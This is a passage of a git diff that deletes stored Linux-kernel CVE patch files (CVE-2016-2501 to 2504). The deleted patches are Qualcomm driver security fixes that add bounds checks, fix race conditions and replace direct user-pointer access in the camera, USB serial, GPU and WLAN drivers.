-        case WE_WOWL_ADD_PTRN:
-           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "ADD_PTRN\n");
--          hdd_add_wowl_ptrn(pAdapter, (char*)wrqu->data.pointer);
-+          hdd_add_wowl_ptrn(pAdapter, extra);
-           break;
-        case WE_WOWL_DEL_PTRN:
-           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "DEL_PTRN\n");
--          hdd_del_wowl_ptrn(pAdapter, (char*)wrqu->data.pointer);
-+          hdd_del_wowl_ptrn(pAdapter, extra);
-           break;
- #if defined WLAN_FEATURE_VOWIFI
-        case WE_NEIGHBOR_REPORT_REQUEST:
-@@ -3859,7 +3872,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-                 if( !neighborReq.no_ssid )
-                 {
-                    neighborReq.ssid.length = (wrqu->data.length - 1) > 32 ? 32 : (wrqu->data.length - 1) ;
--                   vos_mem_copy( neighborReq.ssid.ssId, wrqu->data.pointer, neighborReq.ssid.length );
-+                   vos_mem_copy( neighborReq.ssid.ssId, extra, neighborReq.ssid.length );
-                 }
- 
-                 callbackInfo.neighborRspCallback = NULL;
-@@ -3877,10 +3890,10 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif
-        case WE_SET_AP_WPS_IE:
-           hddLog( LOGE, "Received WE_SET_AP_WPS_IE" );
--          sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), wrqu->data.pointer, wrqu->data.length );
-+          sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), extra, wrqu->data.length );
-           break;
-        case WE_SET_CONFIG:
--          vstatus = hdd_execute_config_command(pHddCtx, wrqu->data.pointer);
-+          vstatus = hdd_execute_config_command(pHddCtx, extra);
-           if (VOS_STATUS_SUCCESS != vstatus)
-           {
-              ret = -EINVAL;
-@@ -4400,7 +4413,7 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-     tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter);
-     int sub_cmd = wrqu->data.flags;
--    int *value = (int*)wrqu->data.pointer;
-+    int *value = (int*)extra;
-     int apps_args[MAX_VAR_ARGS] = {0};
-     int num_args = wrqu->data.length;
-     hdd_station_ctx_t *pStaCtx = NULL ;
-@@ -4751,10 +4764,10 @@ static int iw_qcom_set_wapi_mode(struct net_device *dev, struct iw_request_info
-     hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
-     tCsrRoamProfile *pRoamProfile = &pWextState->roamProfile;
- 
--    WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)wrqu->data.pointer;
-+    WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)extra;
- 
-     hddLog(LOG1, "The function iw_qcom_set_wapi_mode called");
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-+    hddLog(LOG1, "%s: Received data %s", __func__, extra);
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
-     hddLog(LOG1, "%s: Input Data (wreq) WAPI Mode:%02d", __func__, pWapiMode->wapiMode);
- 
-@@ -4817,7 +4830,6 @@ static int iw_qcom_set_wapi_assoc_info(struct net_device *dev, struct iw_request
-     int i = 0, j = 0;
-     hddLog(LOG1, "The function iw_qcom_set_wapi_assoc_info called");
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-     hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -4883,7 +4895,6 @@ static int iw_qcom_set_wapi_key(struct net_device *dev, struct iw_request_info *
- 
-     hddLog(LOG1, "The function iw_qcom_set_wapi_key called ");
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-     hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
- 
-     hddLog(LOG1,":s: INPUT DATA:\nKey Type:0x%02x Key Direction:0x%02x KEY ID:0x%02x\n", __func__,pWapiKey->keyType,pWapiKey->keyDirection,pWapiKey->keyId);
-@@ -4984,12 +4995,11 @@ static int iw_qcom_set_wapi_bkid(struct net_device *dev, struct iw_request_info
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- #ifdef WLAN_DEBUG
-     int i = 0;
--    WLAN_BKID_LIST  *pBkid       = ( WLAN_BKID_LIST *) (wrqu->data.pointer);
-+    WLAN_BKID_LIST  *pBkid       = ( WLAN_BKID_LIST *) extra;
- #endif
- 
-     hddLog(LOG1, "The function iw_qcom_set_wapi_bkid called");
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-     hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
- 
-     hddLog(LOG1,"%s: INPUT DATA:\n BKID Length:0x%08lx\n", __func__,pBkid->length);
-@@ -5066,7 +5076,7 @@ static int iw_set_fties(struct net_device *dev, struct iw_request_info *info,
- #endif
- 
-     // Pass the received FT IEs to SME
--    sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, wrqu->data.pointer,
-+    sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, extra,
-         wrqu->data.length);
- 
-     return 0;
-@@ -5078,7 +5088,7 @@ static int iw_set_dynamic_mcbc_filter(struct net_device *dev,
-         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)wrqu->data.pointer;
-+    tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)extra;
-     hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
-     tpSirWlanSetRxpFilters wlanRxpFilterParam;
-     tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter);
-@@ -5227,7 +5237,7 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i
-         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpHostOffloadRequest pRequest = (tpHostOffloadRequest)wrqu->data.pointer;
-+    tpHostOffloadRequest pRequest = (tpHostOffloadRequest) extra;
-     tSirHostOffloadReq offloadRequest;
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -5236,7 +5246,6 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i
-                                   "%s:LOGP in Progress. Ignore!!!", __func__);
-        return -EBUSY;
-     }
--
-     /* Debug display of request components. */
-     switch (pRequest->offloadType)
-     {
-@@ -5299,7 +5308,7 @@ static int iw_set_keepalive_params(struct net_device *dev, struct iw_request_inf
-         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpKeepAliveRequest pRequest = (tpKeepAliveRequest)wrqu->data.pointer;
-+    tpKeepAliveRequest pRequest = (tpKeepAliveRequest) extra;
-     tSirKeepAliveReq keepaliveRequest;
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -5500,7 +5509,7 @@ static int iw_set_packet_filter_params(struct net_device *dev, struct iw_request
-         union iwreq_data *wrqu, char *extra)
- {   
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpPacketFilterCfg pRequest = (tpPacketFilterCfg)wrqu->data.pointer;
-+    tpPacketFilterCfg pRequest = (tpPacketFilterCfg) extra;
- 
-     return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId);
- }
-@@ -5733,7 +5742,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info,
-   VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-             "PNO data len %d data %s",
-             wrqu->data.length,
--            wrqu->data.pointer);
-+            extra);
- 
-   if (wrqu->data.length <= nOffset )
-   {
-@@ -5771,7 +5780,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info,
- 
-     scan every 5 seconds 2 times, scan every 300 seconds until stopped
-   -----------------------------------------------------------------------*/
--  ptr = (char*)(wrqu->data.pointer + nOffset);
-+  ptr = extra + nOffset;
- 
-   sscanf(ptr,"%hhu%n", &(pnoRequest.enable), &nOffset);
- 
-@@ -5982,7 +5991,7 @@ VOS_STATUS iw_set_rssi_filter(struct net_device *dev, struct iw_request_info *in
-     v_U8_t rssiThreshold = 0;
-     v_U8_t nRead;
- 
--    nRead = sscanf(wrqu->data.pointer + nOffset,"%hhu",
-+    nRead = sscanf(extra + nOffset,"%hhu",
-            &rssiThreshold);
- 
-     if ( 1 != nRead )
-@@ -6143,7 +6152,7 @@ static int iw_set_band_config(struct net_device *dev,
-                            union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tANI_U8 *ptr = (tANI_U8*)wrqu->data.pointer;
-+    tANI_U8 *ptr = extra;
-     int ret = 0;
- 
-     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__);
-@@ -6190,7 +6199,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i
-   VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-             "Power Params data len %d data %s",
-             wrqu->data.length,
--            wrqu->data.pointer);
-+            extra);
- 
-   if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-   {
-@@ -6232,7 +6241,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i
-   powerRequest.uEnableBET        = SIR_NOCHANGE_POWER_VALUE;
-   powerRequest.uBETInterval      = SIR_NOCHANGE_POWER_VALUE;
- 
--  ptr = (char*)(wrqu->data.pointer + nOffset);
-+  ptr = extra + nOffset;
- 
-   while ( uTotalSize )
-   {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2501/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2501/ANY/0001.patch
deleted file mode 100644
index a03745c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2501/ANY/0001.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From 0ee6c6f748e840c266fe26ed3c89d6bd7e3c9d4e Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Wed, 13 Apr 2016 14:31:58 -0700
-Subject: msm: camera: sensor: Validate step_boundary
-
-step_boundary can take values upto the total_steps
-Validate the step_boundary before consuming it.
-Convert the type of step_index and region_index to uint16_t
-step_index and region_index cannot be negative.
-
-CRs-Fixed: 1001092
-Change-Id: I1f23fd6f28bb897824a1ef99a8873b9f986eee70
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
----
- .../msm/camera_v2/sensor/actuator/msm_actuator.c   | 35 ++++++++++++++++++----
- 1 file changed, 29 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 7653b1b..b87e31e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -853,7 +853,7 @@ static int32_t msm_actuator_bivcm_init_step_table(
- {
- 	int16_t code_per_step = 0;
- 	int16_t cur_code = 0;
--	int16_t step_index = 0, region_index = 0;
-+	uint16_t step_index = 0, region_index = 0;
- 	uint16_t step_boundary = 0;
- 	uint32_t max_code_size = 1;
- 	uint16_t data_size = set_info->actuator_params.data_size;
-@@ -894,6 +894,15 @@ static int32_t msm_actuator_bivcm_init_step_table(
- 		step_boundary =
- 			a_ctrl->region_params[region_index].
- 			step_bound[MOVE_NEAR];
-+		if (step_boundary >
-+			set_info->af_tuning_params.total_steps) {
-+			pr_err("invalid step_boundary = %d, max_val = %d",
-+				step_boundary,
-+				set_info->af_tuning_params.total_steps);
-+			kfree(a_ctrl->step_position_table);
-+			a_ctrl->step_position_table = NULL;
-+			return -EINVAL;
-+		}
- 		qvalue = a_ctrl->region_params[region_index].qvalue;
- 		for (; step_index <= step_boundary;
- 			step_index++) {
-@@ -929,20 +938,25 @@ static int32_t msm_actuator_init_step_table(struct msm_actuator_ctrl_t *a_ctrl,
- 	int16_t code_per_step = 0;
- 	uint32_t qvalue = 0;
- 	int16_t cur_code = 0;
--	int16_t step_index = 0, region_index = 0;
-+	uint16_t step_index = 0, region_index = 0;
- 	uint16_t step_boundary = 0;
- 	uint32_t max_code_size = 1;
- 	uint16_t data_size = set_info->actuator_params.data_size;
- 	CDBG("Enter\n");
- 
-+	/* validate the actuator state */
-+	if (a_ctrl->actuator_state != ACT_OPS_ACTIVE) {
-+		pr_err("%s:%d invalid actuator_state %d\n"
-+			, __func__, __LINE__, a_ctrl->actuator_state);
-+		return -EINVAL;
-+	}
- 	for (; data_size > 0; data_size--)
- 		max_code_size *= 2;
- 
- 	a_ctrl->max_code_size = max_code_size;
--	if ((a_ctrl->actuator_state == ACT_OPS_ACTIVE) &&
--		(a_ctrl->step_position_table != NULL)) {
--		kfree(a_ctrl->step_position_table);
--	}
-+
-+	/* free the step_position_table to allocate a new one */
-+	kfree(a_ctrl->step_position_table);
- 	a_ctrl->step_position_table = NULL;
- 
- 	if (set_info->af_tuning_params.total_steps
-@@ -971,6 +985,15 @@ static int32_t msm_actuator_init_step_table(struct msm_actuator_ctrl_t *a_ctrl,
- 		step_boundary =
- 			a_ctrl->region_params[region_index].
- 			step_bound[MOVE_NEAR];
-+		if (step_boundary >
-+			set_info->af_tuning_params.total_steps) {
-+			pr_err("invalid step_boundary = %d, max_val = %d",
-+				step_boundary,
-+				set_info->af_tuning_params.total_steps);
-+			kfree(a_ctrl->step_position_table);
-+			a_ctrl->step_position_table = NULL;
-+			return -EINVAL;
-+		}
- 		for (; step_index <= step_boundary;
- 			step_index++) {
- 			if (qvalue > 1 && qvalue <= MAX_QVALUE)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2502/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2502/ANY/0001.patch
deleted file mode 100644
index 0fc56780..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2502/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 0bc45d7712eabe315ce8299a49d16433c3801156 Mon Sep 17 00:00:00 2001
-From: Manu Gautam <mgautam@codeaurora.org>
-Date: Tue, 5 Apr 2016 15:20:47 +0530
-Subject: usb: f_serial: Check for SMD data length in GSER_IOCTL
-
-If user tries to send SMD data more than the driver
-buffer can handle then fail the same and print
-error message. This smd_write is exposed to userspace
-through ioctl using a misc device.
-
-Change-Id: Ie8a1c1c0799cd10cef512ad6b1e1e95001dd43b2
-Signed-off-by: Manu Gautam <mgautam@codeaurora.org>
----
- drivers/usb/gadget/f_serial.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/usb/gadget/f_serial.c b/drivers/usb/gadget/f_serial.c
-index 8d510e1..4e84de8 100644
---- a/drivers/usb/gadget/f_serial.c
-+++ b/drivers/usb/gadget/f_serial.c
-@@ -1361,6 +1361,13 @@ static long gser_ioctl(struct file *fp, unsigned cmd, unsigned long arg)
- 		smd_port_num =
- 			gserial_ports[gser->port_num].client_port_num;
- 
-+		if (smd_write_arg.size > GSERIAL_BUF_LEN) {
-+			pr_err("%s: Invalid size:%u, max: %u", __func__,
-+				smd_write_arg.size, GSERIAL_BUF_LEN);
-+			ret = -EINVAL;
-+			break;
-+		}
-+
- 		pr_debug("%s: Copying %d bytes from user buffer to local\n",
- 			__func__, smd_write_arg.size);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2503/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2503/3.10/0001.patch
deleted file mode 100644
index ddefe228..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2503/3.10/0001.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From 0c46fc0f8fb7ffd26557b51b235d463a01ee75f5 Mon Sep 17 00:00:00 2001
-From: Divya Ponnusamy <pdivya@codeaurora.org>
-Date: Fri, 6 May 2016 13:24:37 -0600
-Subject: msm: kgsl: Avoid race condition in ioctl_syncsource_destroy
-
-If the ioctl syncsource_destroy is accessed by parallel
-threads, where the spinlock is acquired by threads after
-getting syncsource, then the simultaneous processes try
-to remove the already destroyed syncsource->refcount by
-the first thread that acquires this spinlock. This leads
-to race condition while removing syncsource->idr.
-
-Avoid separate lock inside getting syncsource, instead
-acquire spinlock before we get the syncsource in
-destroy ioctl so that the threads access the spinlock
-and operate on syncsource without use-after-free issue.
-
-Change-Id: I6add3800c40cd09f6e6e0cf2720e69059bd83cbc
-Signed-off-by: Divya Ponnusamy <pdivya@codeaurora.org>
----
- drivers/gpu/msm/kgsl_sync.c | 36 +++++++++++++++++-------------------
- 1 file changed, 17 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sync.c b/drivers/gpu/msm/kgsl_sync.c
-index 44a0f11..df181ad 100644
---- a/drivers/gpu/msm/kgsl_sync.c
-+++ b/drivers/gpu/msm/kgsl_sync.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -473,23 +473,23 @@ long kgsl_ioctl_syncsource_create(struct kgsl_device_private *dev_priv,
- 		goto out;
- 	}
- 
-+	kref_init(&syncsource->refcount);
-+	syncsource->private = private;
-+
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&private->syncsource_lock);
- 	id = idr_alloc(&private->syncsource_idr, syncsource, 1, 0, GFP_NOWAIT);
--	spin_unlock(&private->syncsource_lock);
--	idr_preload_end();
--
- 	if (id > 0) {
--		kref_init(&syncsource->refcount);
- 		syncsource->id = id;
--		syncsource->private = private;
--
- 		param->id = id;
- 		ret = 0;
- 	} else {
- 		ret = id;
- 	}
- 
-+	spin_unlock(&private->syncsource_lock);
-+	idr_preload_end();
-+
- out:
- 	if (ret) {
- 		if (syncsource && syncsource->oneshot)
-@@ -547,25 +547,23 @@ long kgsl_ioctl_syncsource_destroy(struct kgsl_device_private *dev_priv,
- {
- 	struct kgsl_syncsource_destroy *param = data;
- 	struct kgsl_syncsource *syncsource = NULL;
--	struct kgsl_process_private *private;
--
--	syncsource = kgsl_syncsource_get(dev_priv->process_priv,
--				     param->id);
-+	struct kgsl_process_private *private = dev_priv->process_priv;
- 
--	if (syncsource == NULL)
--		return -EINVAL;
-+	spin_lock(&private->syncsource_lock);
-+	syncsource = idr_find(&private->syncsource_idr, param->id);
- 
--	private = syncsource->private;
-+	if (syncsource) {
-+		idr_remove(&private->syncsource_idr, param->id);
-+		syncsource->id = 0;
-+	}
- 
--	spin_lock(&private->syncsource_lock);
--	idr_remove(&private->syncsource_idr, param->id);
--	syncsource->id = 0;
- 	spin_unlock(&private->syncsource_lock);
- 
-+	if (syncsource == NULL)
-+		return -EINVAL;
-+
- 	/* put reference from syncsource creation */
- 	kgsl_syncsource_put(syncsource);
--	/* put reference from getting the syncsource above */
--	kgsl_syncsource_put(syncsource);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2503/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2503/3.18/0002.patch
deleted file mode 100644
index 2ac901a1..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2503/3.18/0002.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From 9ae71bc3a542f68ea93c4eff01a41201ee6d9402 Mon Sep 17 00:00:00 2001
-From: Divya Ponnusamy <pdivya@codeaurora.org>
-Date: Fri, 6 May 2016 13:24:37 -0600
-Subject: msm: kgsl: Avoid race condition in ioctl_syncsource_destroy
-
-If the ioctl syncsource_destroy is accessed by parallel
-threads, where the spinlock is acquired by threads after
-getting syncsource, then the simultaneous processes try
-to remove the already destroyed syncsource->refcount by
-the first thread that acquires this spinlock. This leads
-to race condition while removing syncsource->idr.
-
-Avoid separate lock inside getting syncsource, instead
-acquire spinlock before we get the syncsource in
-destroy ioctl so that the threads access the spinlock
-and operate on syncsource without use-after-free issue.
-
-Change-Id: I6add3800c40cd09f6e6e0cf2720e69059bd83cbc
-Signed-off-by: Divya Ponnusamy <pdivya@codeaurora.org>
----
- drivers/gpu/msm/kgsl_sync.c | 36 +++++++++++++++++-------------------
- 1 file changed, 17 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sync.c b/drivers/gpu/msm/kgsl_sync.c
-index abbdc5d..5c3ae1b 100644
---- a/drivers/gpu/msm/kgsl_sync.c
-+++ b/drivers/gpu/msm/kgsl_sync.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -474,23 +474,23 @@ long kgsl_ioctl_syncsource_create(struct kgsl_device_private *dev_priv,
- 		goto out;
- 	}
- 
-+	kref_init(&syncsource->refcount);
-+	syncsource->private = private;
-+
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&private->syncsource_lock);
- 	id = idr_alloc(&private->syncsource_idr, syncsource, 1, 0, GFP_NOWAIT);
--	spin_unlock(&private->syncsource_lock);
--	idr_preload_end();
--
- 	if (id > 0) {
--		kref_init(&syncsource->refcount);
- 		syncsource->id = id;
--		syncsource->private = private;
--
- 		param->id = id;
- 		ret = 0;
- 	} else {
- 		ret = id;
- 	}
- 
-+	spin_unlock(&private->syncsource_lock);
-+	idr_preload_end();
-+
- out:
- 	if (ret) {
- 		if (syncsource && syncsource->oneshot)
-@@ -548,25 +548,23 @@ long kgsl_ioctl_syncsource_destroy(struct kgsl_device_private *dev_priv,
- {
- 	struct kgsl_syncsource_destroy *param = data;
- 	struct kgsl_syncsource *syncsource = NULL;
--	struct kgsl_process_private *private;
--
--	syncsource = kgsl_syncsource_get(dev_priv->process_priv,
--				     param->id);
-+	struct kgsl_process_private *private = dev_priv->process_priv;
- 
--	if (syncsource == NULL)
--		return -EINVAL;
-+	spin_lock(&private->syncsource_lock);
-+	syncsource = idr_find(&private->syncsource_idr, param->id);
- 
--	private = syncsource->private;
-+	if (syncsource) {
-+		idr_remove(&private->syncsource_idr, param->id);
-+		syncsource->id = 0;
-+	}
- 
--	spin_lock(&private->syncsource_lock);
--	idr_remove(&private->syncsource_idr, param->id);
--	syncsource->id = 0;
- 	spin_unlock(&private->syncsource_lock);
- 
-+	if (syncsource == NULL)
-+		return -EINVAL;
-+
- 	/* put reference from syncsource creation */
- 	kgsl_syncsource_put(syncsource);
--	/* put reference from getting the syncsource above */
--	kgsl_syncsource_put(syncsource);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2504/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2504/3.18/0002.patch
deleted file mode 100644
index 63e5b99b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2504/3.18/0002.patch
+++ /dev/null
@@ -1,80 +0,0 @@
-From 75adbb8cebfe17ace640e6bd89582c1d72196378 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Tue, 3 May 2016 14:11:03 -0600
-Subject: msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process mem_idr too early
-other threads can do operations on the entry by guessing the ID
-or GPU address before the object gets returned by the creating
-operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 738b2f4..8e68a88 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -388,6 +388,17 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process,
- 		kgsl_mmu_put_gpuaddr(pagetable, &entry->memdesc);
- }
- 
-+/* Commit the entry to the process so it can be accessed by other operations */
-+static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry)
-+{
-+	if (!entry)
-+		return;
-+
-+	spin_lock(&entry->priv->mem_lock);
-+	idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+	spin_unlock(&entry->priv->mem_lock);
-+}
-+
- /**
-  * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process
-  * @entry: the memory entry
-@@ -418,7 +429,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&process->mem_lock);
--	id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+	/* Allocate the ID but don't attach the pointer just yet */
-+	id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- 	spin_unlock(&process->mem_lock);
- 	idr_preload_end();
- 
-@@ -2317,6 +2329,7 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, fd);
- 
-+	kgsl_mem_entry_commit_process(entry);
- 	return 0;
- 
- unmap:
-@@ -2580,6 +2593,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, param->fd);
- 
-+	kgsl_mem_entry_commit_process(entry);
- 	return result;
- 
- error_attach:
-@@ -2971,6 +2985,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry(
- 			entry->memdesc.size);
- 	trace_kgsl_mem_alloc(entry);
- 
-+	kgsl_mem_entry_commit_process(entry);
- 	return entry;
- err:
- 	kfree(entry);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2504/3.4-^3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2504/3.4-^3.10/0001.patch
deleted file mode 100644
index e15d8a6f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2504/3.4-^3.10/0001.patch
+++ /dev/null
@@ -1,164 +0,0 @@
-From f7c8dfd7060867d71fc370527e2e2278ffc3ba5e Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Wed, 25 May 2016 21:13:46 +0530
-Subject: msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process idr and rb tree
-too early, other threads can do operations on the entry by
-guessing the ID or GPU address before the object gets returned
-by the creating operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 62 +++++++++++++++++++++++++++++++++++---------------
- 1 file changed, 44 insertions(+), 18 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index e1fd99e..ad1e4e0 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -296,27 +296,20 @@ kgsl_mem_entry_destroy(struct kref *kref)
- EXPORT_SYMBOL(kgsl_mem_entry_destroy);
- 
- /**
-- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and
-- * assign it with a gpu address space before insertion
-+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before
-+ * insertion to the process
-  * @process: the process that owns the memory
-  * @entry: the memory entry
-  *
-- * @returns - 0 on succcess else error code
-+ * @returns - 0 on success else error code
-  *
-- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address.
-- * The assignment of gpu address and insertion into list needs to
-- * happen with the memory lock held to avoid race conditions between
-- * gpu address being selected and some other thread looking through the
-- * rb list in search of memory based on gpuaddr
-  * This function should be called with processes memory spinlock held
-- */
-+*/
- static int
- kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 				struct kgsl_mem_entry *entry)
- {
- 	int ret = 0;
--	struct rb_node **node;
--	struct rb_node *parent = NULL;
